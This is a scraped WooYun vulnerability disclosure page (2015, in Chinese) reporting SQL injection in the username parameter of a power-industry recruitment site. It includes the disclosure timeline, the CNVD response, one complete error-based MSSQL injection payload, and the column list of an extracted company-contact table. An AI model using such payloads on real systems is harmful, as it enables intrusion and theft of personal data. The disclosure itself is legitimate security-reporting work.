电力高级人才网SQL注入漏洞 | wooyun-2015-0143921| WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞标题：电力高级人才网SQL注入漏洞

提交时间：2015-10-06 23:14

修复时间：2015-11-26 11:26

公开时间：2015-11-26 11:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-06：细节已通知厂商并且等待厂商处理中
2015-10-12：厂商已经确认，细节仅向厂商公开
2015-10-22：细节向核心白帽子及相关领域专家公开
2015-11-01：细节向普通白帽子公开
2015-11-11：细节向实习白帽子公开
2015-11-26：细节向公众公开

简要描述：

电力高级人才网（http://www.dlgaoji.com/）创建于2004年，一直从事于电力猎头服务，公司拥有国内最大，最专业的电力人才猎头团队，对中国电力行业有深度的理解，对电力人才的分布了如指掌，研究行业内顶尖人才的分布与流动，积累了电力行业的海量人脉资源和简历，也是中国第一家专注于中国电力行业的猎头机构；随着公司不断的业务发展于2008正式上线电力高级人才网，网站主要从事2大模块；（1）人力资源模块（网站招聘、猎头服务、RPO项目、简历推荐、薪酬调查等、广告招聘等）；（2）电力论坛模块（产品推广、产品发布与采购、公司宣传、技术交流、资料分享等），由深圳市必高人力资源有限公司运营，公司在运营二大模块期间不仅帮助客户解决了招人之困境，更重要的是为公司品牌的宣传推广、产品的销售创造了不菲的收益！为公司在人事、采购、销售、技术上等提供全方位一条龙服务！
电力高级人才网（http://www.dlgaoji.com/）主要服务对象包括电厂、电力工程、电力设计、电力设备、电力环保、核电、风电等电力类企业。目前电力高级人才网拥有超过电力行业70万的专业用户，用户全部在电力行业拥有一年以上的工作经验。
电力高级人才网（http://www.dlgaoji.com/）在电力领域最具优势人才有：发输变电设计、配电/配网设计、发电厂设计；电建EPC、土建、造价、项目工程、总工；核电、电厂运行检修、电厂管理、脱硫脱销、电力环保；电气设备、柜体设计、电气工程师、销售营销、生产管理等。

详细说明：

http://**.**.**.**/job_sendpws.aspx?username=

username可注入

http://**.**.**.**/job_sendpws.aspx?username=' AND 4392=CONVERT(INT,%28SELECT%20CHAR%28119%29%2bCHAR%2876%29%2bCHAR%2876%29%2bCHAR%2872%29%2b%28SELECT%20%28CASE%20WHEN%20%284392%3D4392%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2885%29%2bCHAR%2871%29%2bCHAR%2870%29%2bCHAR%2890%29%29%29%20AND 'MUuV'='MUuV

部分表项信息

gj_companyinfo
	8073
		agreeenddate
		agreeid
		agreestartdate
		agreetype
		classid
		CltIP
		compabstruct
		compid
		complogo
		compname
		compno
		compremark
		compresouce
		comprole
		comptrade
		comptype
		compwww
		compyyz
		contactadr
		contactcity
		contactemail
		contactfax
		contactname
		contactphone
		contactpostcode
		contacttel
		createdate
		inputcode
		inputdate
		inputname
		ishiddenemail
		ishiddenfax
		ishiddentel
		lookjobtel
		modicode
		modidate
		modiname
		moneytype
		numbercount
		regcode
		regdate
		regmoney
		regname
		sharetype

漏洞证明：

修复方案：

版权声明：转载请注明来源渔村安全实验室@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-10-12 11:24

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143921

漏洞标题：电力高级人才网SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：渔村安全实验室

提交时间：2015-10-06 23:14

修复时间：2015-11-26 11:26

公开时间：2015-11-26 11:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源渔村安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143921

漏洞标题：电力高级人才网SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 渔村安全实验室

提交时间：2015-10-06 23:14

修复时间：2015-11-26 11:26

公开时间：2015-11-26 11:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0143921"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 渔村安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：渔村安全实验室

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源渔村安全实验室@乌云